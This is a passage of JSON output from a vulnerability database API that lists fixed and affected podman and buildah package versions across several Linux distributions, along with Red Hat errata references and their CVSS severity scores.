            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=loongarch64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513294?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=ppc64le&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=ppc64le&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513295?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=riscv64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=riscv64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513297?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513298?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86_64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86_64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528357?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armv7&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armv7&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528358?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=ppc64le&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=ppc64le&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528359?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=riscv64&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=riscv64&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528360?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=s390x&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=s390x&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528361?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528362?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86_64&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86_64&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976267?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=aarch64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=aarch64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976268?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armhf&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armhf&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976269?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armv7&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armv7&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976270?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=loongarch64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=loongarch64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976271?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=ppc64le&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=ppc64le&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976272?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=riscv64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=riscv64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976275?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86_64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86_64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013755?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=aarch64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=aarch64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013756?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armhf&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armhf&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013759?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=ppc64le&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=ppc64le&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013760?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=riscv64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=riscv64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013761?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=s390x&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=s390x&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013762?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013763?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86_64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86_64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/923895?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.33.7%2Bds1-1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.33.7%252Bds1-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1026174?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.39.3%2Bds1-1",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.39.3%252Bds1-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/923891?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.39.3%2Bds1-1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.39.3%252Bds1-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/923890?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.43.0%2Bds1-2?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.43.0%252Bds1-2%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1062466?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.43.1%2Bds1-1?distro=trixie",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.43.1%252Bds1-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/76464?format=api",
            "purl": "pkg:ebuild/app-containers/buildah@1.35.3",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/85569?format=api",
            "purl": "pkg:ebuild/app-containers/podman@4.9.4",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/podman@4.9.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/56342?format=api",
            "purl": "pkg:golang/github.com/containers/podman/v4@4.9.4",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:golang/github.com/containers/podman/v4@4.9.4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/56353?format=api",
            "purl": "pkg:golang/github.com/containers/podman/v5@5.0.1",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:golang/github.com/containers/podman/v5@5.0.1"
        }
    ],
    "affected_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1026172?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.19.6%2Bdfsg1-1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-e14a-39np-13bx"
                },
                {
                    "vulnerability": "VCID-fa27-n4rs-h7gp"
                },
                {
                    "vulnerability": "VCID-gs2e-ztdw-ayft"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                },
                {
                    "vulnerability": "VCID-j9nr-4d4t-j3e1"
                },
                {
                    "vulnerability": "VCID-thgc-p1tc-nbdw"
                },
                {
                    "vulnerability": "VCID-xe2z-2g23-skhf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.19.6%252Bdfsg1-1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/923889?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.19.6%2Bdfsg1-1?distro=trixie",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-e14a-39np-13bx"
                },
                {
                    "vulnerability": "VCID-fa27-n4rs-h7gp"
                },
                {
                    "vulnerability": "VCID-gs2e-ztdw-ayft"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                },
                {
                    "vulnerability": "VCID-j9nr-4d4t-j3e1"
                },
                {
                    "vulnerability": "VCID-thgc-p1tc-nbdw"
                },
                {
                    "vulnerability": "VCID-xe2z-2g23-skhf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.19.6%252Bdfsg1-1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1026173?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.28.2%2Bds1-3%2Bdeb12u1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-e14a-39np-13bx"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                },
                {
                    "vulnerability": "VCID-j9nr-4d4t-j3e1"
                },
                {
                    "vulnerability": "VCID-xe2z-2g23-skhf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.28.2%252Bds1-3%252Bdeb12u1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/923887?format=api",
            "purl": "pkg:deb/debian/golang-github-containers-buildah@1.28.2%2Bds1-3%2Bdeb12u1?distro=trixie",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-e14a-39np-13bx"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                },
                {
                    "vulnerability": "VCID-j9nr-4d4t-j3e1"
                },
                {
                    "vulnerability": "VCID-xe2z-2g23-skhf"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/golang-github-containers-buildah@1.28.2%252Bds1-3%252Bdeb12u1%3Fdistro=trixie"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93916?format=api",
            "purl": "pkg:rpm/redhat/buildah@1:1.26.7-1?arch=el9_0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/buildah@1:1.26.7-1%3Farch=el9_0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93909?format=api",
            "purl": "pkg:rpm/redhat/buildah@1:1.29.3-1?arch=el9_2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/buildah@1:1.29.3-1%3Farch=el9_2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93913?format=api",
            "purl": "pkg:rpm/redhat/buildah@1:1.31.5-1?arch=el9_3",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/buildah@1:1.31.5-1%3Farch=el9_3"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93917?format=api",
            "purl": "pkg:rpm/redhat/podman@2:4.2.0-3?arch=el9_0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@2:4.2.0-3%3Farch=el9_0"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93910?format=api",
            "purl": "pkg:rpm/redhat/podman@2:4.4.1-16?arch=el9_2",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@2:4.4.1-16%3Farch=el9_2"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93914?format=api",
            "purl": "pkg:rpm/redhat/podman@3:4.4.1-3.2.rhaos4.12?arch=el8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@3:4.4.1-3.2.rhaos4.12%3Farch=el8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93912?format=api",
            "purl": "pkg:rpm/redhat/podman@3:4.4.1-5.3.rhaos4.13?arch=el8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@3:4.4.1-5.3.rhaos4.13%3Farch=el8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93918?format=api",
            "purl": "pkg:rpm/redhat/podman@3:4.4.1-7.3.rhaos4.13?arch=el8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bq1t-9nnj-mkes"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@3:4.4.1-7.3.rhaos4.13%3Farch=el8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93911?format=api",
            "purl": "pkg:rpm/redhat/podman@3:4.4.1-13.4.rhaos4.14?arch=el8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bq1t-9nnj-mkes"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@3:4.4.1-13.4.rhaos4.14%3Farch=el8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93915?format=api",
            "purl": "pkg:rpm/redhat/podman@3:4.4.1-23.2.rhaos4.15?arch=el8",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-bq1t-9nnj-mkes"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@3:4.4.1-23.2.rhaos4.15%3Farch=el8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/93919?format=api",
            "purl": "pkg:rpm/redhat/podman@4:4.9.4-3?arch=el9_4",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-f8ak-21d8-juff"
                },
                {
                    "vulnerability": "VCID-gyyv-8fkv-syh5"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/podman@4:4.9.4-3%3Farch=el9_4"
        }
    ],
    "references": [
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2049",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2049"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2055",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2055"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2064",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2064"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2066",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2066"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2077",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2077"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2084",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2084"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2089",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2089"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2090",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2090"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2097",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
                    "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-05-02T15:05:28Z/"
                }
            ],
            "url": "https://access.redhat.com/errata/RHSA-2024:2097"
        },
        {
            "reference_url": "https://access.redhat.com/errata/RHSA-2024:2098",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "8.6",
                    "scoring_system": "cvssv3.1",
                    "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                },
                {
                    "value": "6.3",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H"
                },
                {
                    "value": "MODERATE",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                },
                {
                    "value": "Track*",
                    "scoring_system": "ssvc",
